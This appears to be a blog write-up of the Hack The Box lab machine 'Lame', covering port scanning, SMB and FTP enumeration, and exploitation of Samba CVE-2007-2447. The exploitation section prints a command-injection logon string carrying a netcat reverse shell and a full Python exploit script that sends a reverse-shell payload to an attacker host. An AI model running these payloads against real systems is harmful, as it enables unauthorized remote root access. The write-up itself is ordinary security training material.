Home Hack The Box - Lame
Post
Cancel

Hack The Box - Lame

Recon

Starting with nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
# nmap --min-rate 10000 -oN lame.nmap 10.10.10.3 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 19:14 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.63s latency). 
Not shown: 996 filtered tcp ports (no-response) 
PORT    STATE SERVICE 
21/tcp  open  ftp 
22/tcp  open  ssh 
139/tcp open  netbios-ssn 
445/tcp open  microsoft-ds

# Full TCP port scan
# nmap -p- --min-rate 10000 -oN lame.nmap 10.10.10.3 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 19:14 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.59s latency). 
Not shown: 65530 filtered tcp ports (no-response) 
PORT     STATE SERVICE 
21/tcp   open  ftp 
22/tcp   open  ssh 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
3632/tcp open  distccd 
Nmap done: 1 IP address (1 host up) scanned in 133.07 seconds

# Full UDP port scan

#nmap -sU -p- --min-rate 10000 -oN lame.nmap 10.10.10.3 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 19:17 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.48s latency). 
Not shown: 65531 open|filtered udp ports (no-response) 
PORT     STATE  SERVICE 
22/udp   closed ssh 
139/udp  closed netbios-ssn 
445/udp  closed microsoft-ds 
3632/udp closed distcc 
Nmap done: 1 IP address (1 host up) scanned in 50.50 seconds


#nmap -sC -sV -p 22,139,445,3632 10.10.10.3 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 19:19 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.51s latency). 
PORT     STATE SERVICE     VERSION
21/tcp open  ftp     vsftpd 2.3.4 
|_ftp-anon: Anonymous FTP login allowed (FTP code 230) 
| ftp-syst:  
|   STAT:  
| FTP server status: 
|      Connected to 10.10.14.2 
|      Logged in as ftp 
|      TYPE: ASCII 
|      No session bandwidth limit 
|      Session timeout in seconds is 300 
|      Control connection is plain text 
|      Data connections will be plain text 
|      vsFTPd 2.3.4 - secure, fast, stable 
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 
| ssh-hostkey:  
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) 
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 
Host script results: 
|_clock-skew: mean: 2h29m43s, deviation: 3h32m09s, median: -17s 
| smb-os-discovery:  
|   OS: Unix (Samba 3.0.20-Debian) 
|   Computer name: lame 
|   NetBIOS computer name:  
|   Domain name: hackthebox.gr 
|   FQDN: lame.hackthebox.gr 
|_  System time: 2022-11-11T08:34:45-05:00 
|_smb2-time: Protocol negotiation failed (SMB2) 
| smb-security-mode:  
|   account_used: <blank> 
|   authentication_level: user 
|   challenge_response: supported 
|_  message_signing: disabled (dangerous, but default) 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds

Our initial recon shows that we potentially have four different points of entry to this machine.

  • Port 21: vsftpd 2.3.4 (Anonymous FTP login allowed)
  • Port 22: OpenSSH 4.7p1 Debian 8ubuntu1
  • Port 139/445: Running samba 3.0.20-Debian
  • Port 3632:** distccd v1

Enumeration

Port - 21 (vsftpd 2.3.4 )

Anonymous Login

Since FTP allows anonymous logins, checked it, but the directory was empty.

A quick google search shows us that this version is famously vulnerable to a backdoor command execution that is triggered by entering a string that contains the characters “:)” as the username. When the backdoor is triggered, the target machine opens a shell on port 6200. Found a nmap script to check this vulnerability.Scanning with nmap script shows that this machine is not vulnerable.

1
2
3
4
5
6
7
#nmap --script ftp-vsftpd-backdoor.nse 10.10.10.3 -p 21 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 19:33 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.27s latency). 
PORT   STATE SERVICE 
21/tcp open  ftp 
Nmap done: 1 IP address (1 host up) scanned in 27.98 seconds

SMB - TCP 445

Anonymous Login

smbmap shows only /tmp directory is accessible without credentials.

1
2
3
4
5
6
7
8
9
#smbmap -H 10.10.10.3 
[+] IP: 10.10.10.3:445	Name: 10.10.10.3                                         
        Disk                                                  	Permissions	Comment 
	----                                                  	-----------	------- 
	print$                                            	NO ACCESS	Printer Drivers 
	tmp                                               	READ, WRITE	oh noes! 
	opt                                               	NO ACCESS	 
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian)) 
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

After checking the /tmp directory with smbclient, it seems there’s nothing interesting.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#smbclient -N //10.10.10.3/tmp 
Anonymous login successful 
Try "help" to get a list of possible commands. 
smb: \> dir 
  .                                   D        0  Fri Nov 11 19:40:58 2022 
  ..                                 DR        0  Sat Oct 31 13:18:58 2020 
  .ICE-unix                          DH        0  Fri Nov 11 18:28:11 2022 
  vmware-root                        DR        0  Fri Nov 11 18:28:39 2022 
  .X11-unix                          DH        0  Fri Nov 11 18:28:36 2022 
  .X0-lock                           HR       11  Fri Nov 11 18:28:36 2022 
  5575.jsvc_up                        R        0  Fri Nov 11 18:29:13 2022 
  vgauthsvclog.txt.0                  R     1600  Fri Nov 11 18:28:10 2022 
		7282168 blocks of size 1024. 5386512 blocks available 
smb: \>

On checking searchsplpoit, we got some exploits for samba 3.0.

However,

1
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) 

seems interesting. This is CVE-2007-2447, often referred to as Samba usermap script.On checking the script, there seems to be an issue with the username field. If we send shell metacharacters into the username we exploit a vulnerability which allows us to execute arbitrary commands.

Going through the code tells us that the script is running the following command, where payload.encoded would be a reverse shell sent back to our attack machine.

1
"/=`nohup " + payload.encoded + "`"

Port 3632 distcc v1

Googling “distcc v1” reveals that this service is vulnerable to a remote code execution and there’s an nmap script that can verify that. On executing nmap script, it states that this machine is vulnerable.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#nmap --script distcc-cve2004-2687.nse -p 3632 10.10.10.3 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 20:11 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.31s latency). 
PORT     STATE SERVICE 
3632/tcp open  distccd 
| distcc-cve2004-2687:  
|   VULNERABLE: 
|   distcc Daemon Command Execution 
|     State: VULNERABLE (Exploitable) 
|     IDs:  CVE:CVE-2004-2687 
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) 
|       Allows executing of arbitrary commands on systems running distccd 3.1 and 
|       earlier. The vulnerability is the consequence of weak service configuration. 
|        
|     Disclosure date: 2002-02-01 
|     Extra information: 
|        
|     uid=1(daemon) gid=1(daemon) groups=1(daemon) 
|    
|     References: 
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687 
|       https://distcc.github.io/security.html 
|_      https://nvd.nist.gov/vuln/detail/CVE-2004-2687 
Nmap done: 1 IP address (1 host up) scanned in 7.66 seconds

Exploitation:

1. Samba Exploit

Exploing using smbclient.

1
2
3
4
5
6
#smbclient //10.10.10.3/tmp 
Enter WORKGROUP\niraz's password:  
Anonymous login successful 
Try "help" to get a list of possible commands. 
smb: \> logon "/=`nohup nc -nv 10.10.14.2 4444 -e /bin/sh`" 
Password:

and we get connection back to our machine.

1
2
3
4
5
#nc -lvnp 4444 
listening on [any] 4444 ... 
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.3] 53095
whoami 
root

2. Exploiting samba using python script

After Googling it let me to this GitHub with a Python POC for the exploit. we can get a shell easily, by following the “install” instructions and then running the script:

But writing my own script, so that i can have some practice in writing code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import sys 
from smb.SMBConnection import SMBConnection

def exploit(rhost,rport,lhost,lport): 
    payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago' 
    username = "/=`nohup " + payload + "`" 
     
    smb_conn = SMBConnection(username, "", "", "") 
    try: 
        smb_conn.connect(rhost,rport) 
    except: 
        print("[+] Payload was sent but something went wrong - check netcat !")

def main(): 
    print("[*] CVE-2007-2447 - Samba usermap script") 
    if len(sys.argv) != 5: 
        print("(+)Usage: %s <rhost> <rport> <lhost> <lport> " % sys.argv[0]) 
    else: 
        print("[+] Connecting !") 
        rhost = sys.argv[1] 
        rport = sys.argv[2] 
        lhost = sys.argv[3] 
        lport = sys.argv[4] 
        exploit(rhost,rport,lhost,lport)

if __name__ == '__main__': 
    main()

running the above python script we get the root shell

1
2
3
#python3 lame-smb-exploit.py 10.10.10.3 139 10.10.14.2 4444 
[*] CVE-2007-2447 - Samba usermap script 
[+] Connecting !
1
2
3
4
5
#nc -lvnp 4444 
listening on [any] 4444 ... 
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.3] 39930
whoami
root

To get a nice shell we can use pty

1
2
python -c 'import pty; pty.spawn("bash")' 
root@lame:/#
This post is licensed under CC BY 4.0 by the author.

Vulnhub - Development

Hack The Box - Devel

Comments powered by Disqus.